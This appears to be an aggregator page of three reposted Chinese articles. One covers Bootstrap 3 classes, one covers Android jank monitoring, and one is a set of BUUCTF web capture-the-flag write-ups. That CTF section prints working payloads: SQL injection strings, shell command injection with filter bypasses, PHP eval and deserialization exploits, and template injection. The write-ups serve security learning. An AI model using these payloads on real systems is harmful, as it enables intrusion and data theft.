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...颜色。 Class 描述 .active 鼠标悬停在行或单元格上时所设置的颜色 .success 标识成功或积极的动作 .info 标识普通的提示信息或动作 .warning 标识警告或需要用户注意 .danger 标识危险或潜在的带来负面影响的动作 5.7 响应式表格 将任何 .table 元素包裹在 .table-responsive 元素内,即可创建响应式表格,其会在小屏幕设备上(小于768px)水平滚动。当屏幕大于 768px 宽度时,水平滚动条消失。 6 表单 6.1 基本实例 单独的表单控件会被自动赋予一些全局样式。所有设置了 .form-control 类的 <input>、<textarea> 和 <select> 元素都将被默认设置宽度属性为 width: 100%;。 将 label 元素和前面提到的控件包裹在 .form-group 中可以获得最好的排列。 <form><div class="form-group"><label for="exampleInputEmail1">Email address</label><input type="email" class="form-control" id="exampleInputEmail1" placeholder="Email"></div><div class="form-group"><label for="exampleInputPassword1">Password</label><input type="password" class="form-control" id="exampleInputPassword1" placeholder="Password"></div><div class="form-group"><label for="exampleInputFile">File input</label><input type="file" id="exampleInputFile"><p class="help-block">Example block-level help text here.</p></div><div class="checkbox"><label><input type="checkbox"> Check me out</label></div><button type="submit" class="btn btn-default">Submit</button></form> 6.2 内联表单 为 <form> 元素添加 .form-inline 类可使其内容左对齐并且表现为 inline-block 级别的控件。只适用于视口(viewport)至少在 768px 宽度时(视口宽度再小的话就会使表单折叠) 6.3 水平排列的表单 通过为表单添加 .form-horizontal 类,并联合使用 Bootstrap 预置的栅格类,可以将 label 标签和控件组水平并排布局。这样做将改变 .form-group 的行为,使其表现为栅格系统中的行(row),因此就无需再额外添加 .row 了 <form class="form-horizontal"><div class="form-group"><label for="inputEmail3" class="col-sm-2 control-label">Email</label><div class="col-sm-10"><input type="email" class="form-control" id="inputEmail3" placeholder="Email"></div></div><div class="form-group"><label for="inputPassword3" class="col-sm-2 control-label">Password</label><div class="col-sm-10"><input type="password" class="form-control" id="inputPassword3" placeholder="Password"></div></div><div class="form-group"><div class="col-sm-offset-2 col-sm-10"><div class="checkbox"><label><input type="checkbox"> Remember me</label></div></div></div><div class="form-group"><div class="col-sm-offset-2 col-sm-10"><button type="submit" class="btn btn-default">Sign in</button></div></div></form> 6.4 表单控件 输入框 包括大部分表单控件、文本输入域控件,还支持所有 HTML5 类型的输入控件: text、password、datetime、datetime-local、date、month、time、week、number、email、url、search、tel 和 color。 只有正确设置了 type 属性的输入控件才能被赋予正确的样式。 文本域 支持多行文本的表单控件。可根据需要改变 rows 属性。 多选和单选框 默认样式 <div class="checkbox"><label><input type="checkbox" value="">Option one is this and that—be sure to include why it's great</label></div><div class="checkbox disabled"><label><input type="checkbox" value="" disabled>Option two is disabled</label></div><div class="radio"><label><input type="radio" name="optionsRadios" id="optionsRadios1" value="option1" checked>Option one is this and that—be sure to include why it's great</label></div><div class="radio"><label><input type="radio" name="optionsRadios" id="optionsRadios2" value="option2">Option two can be something else and selecting it will deselect option one</label></div><div class="radio disabled"><label><input type="radio" name="optionsRadios" id="optionsRadios3" value="option3" disabled>Option three is disabled</label></div> 内联单选和多选框 <label class="checkbox-inline"><input type="checkbox" id="inlineCheckbox1" value="option1"> 1</label><label class="checkbox-inline"><input type="checkbox" id="inlineCheckbox2" value="option2"> 2</label><label class="checkbox-inline"><input type="checkbox" id="inlineCheckbox3" value="option3"> 3</label><label class="radio-inline"><input type="radio" name="inlineRadioOptions" id="inlineRadio1" value="option1"> 1</label><label class="radio-inline"><input type="radio" name="inlineRadioOptions" id="inlineRadio2" value="option2"> 2</label><label class="radio-inline"><input type="radio" name="inlineRadioOptions" id="inlineRadio3" value="option3"> 3</label> 不带文本的Checkbox 和 radio <label><input type="checkbox" id="blankCheckbox" value="option1" aria-label="..."></label></div><div class="radio"><label><input type="radio" name="blankRadio" id="blankRadio1" value="option1" aria-label="..."></label></div> 下拉列表 <select class="form-control"><option>1</option><option>2</option><option>3</option><option>4</option><option>5</option></select> 静态内容 如果需要在表单中将一行纯文本和 label 元素放置于同一行,为 <p> 元素添加 .form-control-static 类即可 <form class="form-horizontal"><div class="form-group"><label class="col-sm-2 control-label">Email</label><div class="col-sm-10"><p class="form-control-static">email@example.com</p></div></div><div class="form-group"><label for="inputPassword" class="col-sm-2 control-label">Password</label><div class="col-sm-10"><input type="password" class="form-control" id="inputPassword" placeholder="Password"></div></div></form> 帮助文字 <label class="sr-only" for="inputHelpBlock">Input with help text</label><input type="text" id="inputHelpBlock" class="form-control" aria-describedby="helpBlock">...<span id="helpBlock" class="help-block">A block of help text that breaks onto a new line and may extend beyond one line.</span> 校验状态 Bootstrap 对表单控件的校验状态,如 error、warning 和 success 状态,都定义了样式。使用时,添加 .has-warning、.has-error或 .has-success 类到这些控件的父元素即可。任何包含在此元素之内的 .control-label、.form-control 和 .help-block 元素都将接受这些校验状态的样式。 <div class="form-group has-success"><label class="control-label" for="inputSuccess1">Input with success</label><input type="text" class="form-control" id="inputSuccess1" aria-describedby="helpBlock2"><span id="helpBlock2" class="help-block">A block of help text that breaks onto a new line and may extend beyond one line.</span></div><div class="form-group has-warning"><label class="control-label" for="inputWarning1">Input with warning</label><input type="text" class="form-control" id="inputWarning1"></div><div class="form-group has-error"><label class="control-label" for="inputError1">Input with error</label><input type="text" class="form-control" id="inputError1"></div><div class="has-success"><div class="checkbox"><label><input type="checkbox" id="checkboxSuccess" value="option1">Checkbox with success</label></div></div><div class="has-warning"><div class="checkbox"><label><input type="checkbox" id="checkboxWarning" value="option1">Checkbox with warning</label></div></div><div class="has-error"><div class="checkbox"><label><input type="checkbox" id="checkboxError" value="option1">Checkbox with error</label></div></div> 添加额外的图标 你还可以针对校验状态为输入框添加额外的图标。只需设置相应的 .has-feedback 类并添加正确的图标即可 <div class="form-group has-success has-feedback"><label class="control-label" for="inputSuccess2">Input with success</label><input type="text" class="form-control" id="inputSuccess2" aria-describedby="inputSuccess2Status"><span class="glyphicon glyphicon-ok form-control-feedback" aria-hidden="true"></span><span id="inputSuccess2Status" class="sr-only">(success)</span></div> 控件尺寸 通过 .input-lg 类似的类可以为控件设置高度,通过 .col-lg- 类似的类可以为控件设置宽度。 高度尺寸 创建大一些或小一些的表单控件以匹配按钮尺寸 <input class="form-control input-lg" type="text" placeholder=".input-lg"><input class="form-control" type="text" placeholder="Default input"><input class="form-control input-sm" type="text" placeholder=".input-sm"><select class="form-control input-lg">...</select><select class="form-control">...</select><select class="form-control input-sm">...</select> 水平排列的表单组的尺寸 通过添加 .form-group-lg 或 .form-group-sm 类,为 .form-horizontal 包裹的 label 元素和表单控件快速设置尺寸。 <form class="form-horizontal"><div class="form-group form-group-lg"><label class="col-sm-2 control-label" for="formGroupInputLarge">Large label</label><div class="col-sm-10"><input class="form-control" type="text" id="formGroupInputLarge" placeholder="Large input"></div></div><div class="form-group form-group-sm"><label class="col-sm-2 control-label" for="formGroupInputSmall">Small label</label><div class="col-sm-10"><input class="form-control" type="text" id="formGroupInputSmall" placeholder="Small input"></div></div></form> 7 按钮 7.1 可作为按钮使用的标签或元素 为 <a>、<button> 或 <input> 元素添加按钮类(button class)即可使用 Bootstrap 提供的样式 <a class="btn btn-default" href="" role="button">Link</a><button class="btn btn-default" type="submit">Button</button><input class="btn btn-default" type="button" value="Input"><input class="btn btn-default" type="submit" value="Submit"> 7.2 预定义样式 <!-- Standard button --><button type="button" class="btn btn-default">(默认样式)Default</button><!-- Provides extra visual weight and identifies the primary action in a set of buttons --><button type="button" class="btn btn-primary">(首选项)Primary</button><!-- Indicates a successful or positive action --><button type="button" class="btn btn-success">(成功)Success</button><!-- Contextual button for informational alert messages --><button type="button" class="btn btn-info">(一般信息)Info</button><!-- Indicates caution should be taken with this action --><button type="button" class="btn btn-warning">(警告)Warning</button><!-- Indicates a dangerous or potentially negative action --><button type="button" class="btn btn-danger">(危险)Danger</button><!-- Deemphasize a button by making it look like a link while maintaining button behavior --><button type="button" class="btn btn-link">(链接)Link</button> 7.3 尺寸 需要让按钮具有不同尺寸吗?使用 .btn-lg、.btn-sm 或 .btn-xs 就可以获得不同尺寸的按钮。 通过给按钮添加 .btn-block 类可以将其拉伸至父元素100%的宽度,而且按钮也变为了块级(block)元素。 7.4 激活状态 添加 .active 类 7.5 禁用状态 为 <button> 元素添加 disabled 属性,使其表现出禁用状态。 为基于 <a> 元素创建的按钮添加 .disabled 类。 8 图片 8.1 响应式图片 在 Bootstrap 版本 3 中,通过为图片添加 .img-responsive 类可以让图片支持响应式布局。其实质是为图片设置了 max-width: 100%;、 height: auto; 和 display: block; 属性,从而让图片在其父元素中更好的缩放。 如果需要让使用了 .img-responsive 类的图片水平居中,请使用 .center-block 类,不要用 .text-center <img src="..." class="img-responsive" alt="Responsive image"> 8.2 图片形状 <img src="..." alt="..." class="img-rounded"><img src="..." alt="..." class="img-circle"><img src="..." alt="..." class="img-thumbnail"> 9 辅助类 9.1 文本颜色 <p class="text-muted">...</p><p class="text-primary">...</p><p class="text-success">...</p><p class="text-info">...</p><p class="text-warning">...</p><p class="text-danger">...</p> 9.2 背景色 <p class="bg-primary">...</p><p class="bg-success">...</p><p class="bg-info">...</p><p class="bg-warning">...</p><p class="bg-danger">...</p> 9.3 三角符号 <span class="caret"></span> 9.4 浮动 <div class="pull-left">...</div><div class="pull-right">...</div> 9.5 让内容块居中 <div class="center-block">...</div> 9.6 清除浮动 通过为父元素添加 .clearfix 类可以很容易地清除浮动(float) <!-- Usage as a class --><div class="clearfix">...</div> 9.7 显示或隐藏内容 <div class="show">...</div><div class="hidden">...</div> 9.10 图片替换 使用 .text-hide 类或对应的 mixin 可以用来将元素的文本内容替换为一张背景图。 <h1 class="text-hide">Custom heading</h1> 10 响应式工具 10.1 不同视口下隐藏显示 .visible-xs- .visible-sm- .visible-md- .visible-lg- .hidden-xs .hidden-sm .hidden-md .hidden-lg.visible--block .visible--inline .visible--inline-block 10.2 打印类 .visible-print-block.visible-print-inline.visible-print-inline-block.hidden-print 打印机下隐藏 本篇文章为转载内容。原文链接:https://blog.csdn.net/m0_67155975/article/details/123351126。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 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2023-10-18 14:41:25
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...漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
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...置,您必须将应用程序部署到运行Android 8.0(API级别26)或更高版本的设备。 4.Trace System Calls:捕获细粒度的详细信息,使您可以检查应用程序与系统资源的交互方式 您可以检查线程状态的确切时间和持续时间,可视化CPU瓶颈在所有内核中的位置,并添加自定义跟踪事件进行分析。在对性能问题进行故障排除时,此类信息可能至关重要。要使用此配置,您必须将应用程序部署到运行Android 7.0(API级别24)或更高版本的设备。 使用方式: Debug.startMethodTracing("");// 需要检测的代码片段...Debug.stopMethodTracing(); 优点:有比较全面的调用栈以及图像化方法时间显示,包含所有线程的情况 缺点:本身也会带来一点的性能开销,可能会带偏优化方向 火焰图:可以显示当前应用的方法堆栈: 3.Systrace Systrace在前面一篇分析启动优化的文章讲解过 这里我们简单来复习下: Systrace用来记录当前应用的系统以及应用(使用Trace类打点)的各阶段耗时信息包括绘制信息以及CPU信息等。 使用方式: Trace.beginSection("MyApp.onCreate_1");alt(200);Trace.endSection(); 在命令行中: python systrace.py -t 5 sched gfx view wm am app webview -a "com.chinaebipay.thirdcall" -o D:\trac1.html 记录的方法以及CPU中的耗时情况: 优点: 1.轻量级,开销小,CPU使用率可以直观反映 2.右侧的Alerts能够根据我们应用的问题给出具体的建议,比如说,它会告诉我们App界面的绘制比较慢或者GC比较频繁。 4.StrictModel StrictModel是Android提供的一种运行时检测机制,用来帮助开发者自动检测代码中不规范的地方。 主要和两部分相关: 1.线程相关 2.虚拟机相关 基础代码: private void initStrictMode() {// 1、设置Debug标志位,仅仅在线下环境才使用StrictModeif (DEV_MODE) {// 2、设置线程策略StrictMode.setThreadPolicy(new StrictMode.ThreadPolicy.Builder().detectCustomSlowCalls() //API等级11,使用StrictMode.noteSlowCode.detectDiskReads().detectDiskWrites().detectNetwork() // or .detectAll() for all detectable problems.penaltyLog() //在Logcat 中打印违规异常信息// .penaltyDialog() //也可以直接跳出警报dialog// .penaltyDeath() //或者直接崩溃.build());// 3、设置虚拟机策略StrictMode.setVmPolicy(new StrictMode.VmPolicy.Builder().detectLeakedSqlLiteObjects()// 给NewsItem对象的实例数量限制为1.setClassInstanceLimit(NewsItem.class, 1).detectLeakedClosableObjects() //API等级11.penaltyLog().build());} } 线上监控: 线上需要自动化的卡顿检测方案来定位卡顿,它能记录卡顿发生时的场景。 自动化监控原理: 采用拦截消息调度流程,在消息执行前埋点计时,当耗时超过阈值时,则认为是一次卡顿,会进行堆栈抓取和上报工作 首先,我们看下Looper用于执行消息循环的loop()方法,关键代码如下所示: / Run the message queue in this thread. Be sure to call {@link quit()} to end the loop./public static void loop() {...for (;;) {Message msg = queue.next(); // might blockif (msg == null) {// No message indicates that the message queue is quitting.return;// This must be in a local variable, in case a UI event sets the loggerfinal Printer logging = me.mLogging;if (logging != null) {// 1logging.println(">>>>> Dispatching to " + msg.target + " " +msg.callback + ": " + msg.what);}...try {// 2 msg.target.dispatchMessage(msg);dispatchEnd = needEndTime ? SystemClock.uptimeMillis() : 0;} finally {if (traceTag != 0) {Trace.traceEnd(traceTag);} }...if (logging != null) {// 3logging.println("<<<<< Finished to " + msg.target + " " + msg.callback);} 在Looper的loop()方法中,在其执行每一个消息(注释2处)的前后都由logging进行了一次打印输出。可以看到,在执行消息前是输出的">>>>> Dispatching to “,在执行消息后是输出的”<<<<< Finished to ",它们打印的日志是不一样的,我们就可以由此来判断消息执行的前后时间点。 具体的实现可以归纳为如下步骤: 1、首先,我们需要使用Looper.getMainLooper().setMessageLogging()去设置我们自己的Printer实现类去打印输出logging。这样,在每个message执行的之前和之后都会调用我们设置的这个Printer实现类。 2、如果我们匹配到">>>>> Dispatching to "之后,我们就可以执行一行代码:也就是在指定的时间阈值之后,我们在子线程去执行一个任务,这个任务就是去获取当前主线程的堆栈信息以及当前的一些场景信息,比如:内存大小、电脑、网络状态等。 3、如果在指定的阈值之内匹配到了"<<<<< Finished to ",那么说明message就被执行完成了,则表明此时没有产生我们认为的卡顿效果,那我们就可以将这个子线程任务取消掉。 这里我们使用blockcanary来做测试: BlockCanary APM是一个非侵入式的性能监控组件,可以通过通知的形式弹出卡顿信息。它的原理就是我们刚刚讲述到的卡顿监控的实现原理。 使用方式: 1.导入依赖 implementation 'com.github.markzhai:blockcanary-android:1.5.0' Application的onCreate方法中开启卡顿监控 // 注意在主进程初始化调用BlockCanary.install(this, new AppBlockCanaryContext()).start(); 3.继承BlockCanaryContext类去实现自己的监控配置上下文类 public class AppBlockCanaryContext extends BlockCanaryContext {....../ 指定判定为卡顿的阈值threshold (in millis), 你可以根据不同设备的性能去指定不同的阈值 @return threshold in mills/public int provideBlockThreshold() {return 1000;}....} 4.在Activity的onCreate方法中执行一个耗时操作 try {Thread.sleep(4000);} catch (InterruptedException e) {e.printStackTrace();} 5.结果: 可以看到一个和LeakCanary一样效果的阻塞可视化堆栈图 那有了BlockCanary的方法耗时监控方式是不是就可以解百愁了呢,呵呵。有那么容易就好了 根据原理:我们拿到的是msg执行前后的时间和堆栈信息,如果msg中有几百上千个方法,就无法确认到底是哪个方法导致的耗时,也有可能是多个方法堆积导致。 这就导致我们无法准确定位哪个方法是最耗时的。如图中:堆栈信息是T2的,而发生耗时的方法可能是T1到T2中任何一个方法甚至是堆积导致。 那如何优化这块? 这里我们采用字节跳动给我们提供的一个方案:基于 Sliver trace 的卡顿监控体系 Sliver trace 整体流程图: 主要包含两个方面: 检测方案: 在监控卡顿时,首先需要打开 Sliver 的 trace 记录能力,Sliver 采样记录 trace 执行信息,对抓取到的堆栈进行 diff 聚合和缓存。 同时基于我们的需要设置相应的卡顿阈值,以 Message 的执行耗时为衡量。对主线程消息调度流程进行拦截,在消息开始分发执行时埋点,在消息执行结束时计算消息执行耗时,当消息执行耗时超过阈值,则认为产生了一次卡顿。 堆栈聚合策略: 当卡顿发生时,我们需要为此次卡顿准备数据,这部分工作是在端上子线程中完成的,主要是 dump trace 到文件以及过滤聚合要上报的堆栈。分为以下几步: 1.拿到缓存的主线程 trace 信息并 dump 到文件中。 2.然后从文件中读取 trace 信息,按照数据格式,从最近的方法栈向上追溯,找到当前 Message 包含的全部 trace 信息,并将当前 Message 的完整 trace 写入到待上传的 trace 文件中,删除其余 trace 信息。 3.遍历当前 Message trace,按照(Method 执行耗时 > Method 耗时阈值 & Method 耗时为该层堆栈中最耗时)为条件过滤出每一层函数调用堆栈的最长耗时函数,构成最后要上报的堆栈链路,这样特征堆栈中的每一步都是最耗时的,且最底层 Method 为最后的耗时大于阈值的 Method。 之后,将 trace 文件和堆栈一同上报,这样的特征堆栈提取策略保证了堆栈聚合的可靠性和准确性,保证了上报到平台后堆栈的正确合理聚合,同时提供了进一步分析问题的 trace 文件。 可以看到字节给的是一整套监控方案,和前面BlockCanary不同之处就在于,其是定时存储堆栈,缓存,然后使用diff去重的方式,并上传到服务器,可以最大限度的监控到可能发生比较耗时的方法。 开发中哪些习惯会影响卡顿的发生 1.布局太乱,层级太深。 1.1:通过减少冗余或者嵌套布局来降低视图层次结构。比如使用约束布局代替线性布局和相对布局。 1.2:用 ViewStub 替代在启动过程中不需要显示的 UI 控件。 1.3:使用自定义 View 替代复杂的 View 叠加。 2.主线程耗时操作 2.1:主线程中不要直接操作数据库,数据库的操作应该放在数据库线程中完成。 2.2:sharepreference尽量使用apply,少使用commit,可以使用MMKV框架来代替sharepreference。 2.3:网络请求回来的数据解析尽量放在子线程中,不要在主线程中进行复制的数据解析操作。 2.4:不要在activity的onResume和onCreate中进行耗时操作,比如大量的计算等。 2.5:不要在 draw 里面调用耗时函数,不能 new 对象 3.过度绘制 过度绘制是同一个像素点上被多次绘制,减少过度绘制一般减少布局背景叠加等方式,如下图所示右边是过度绘制的图片。 4.列表 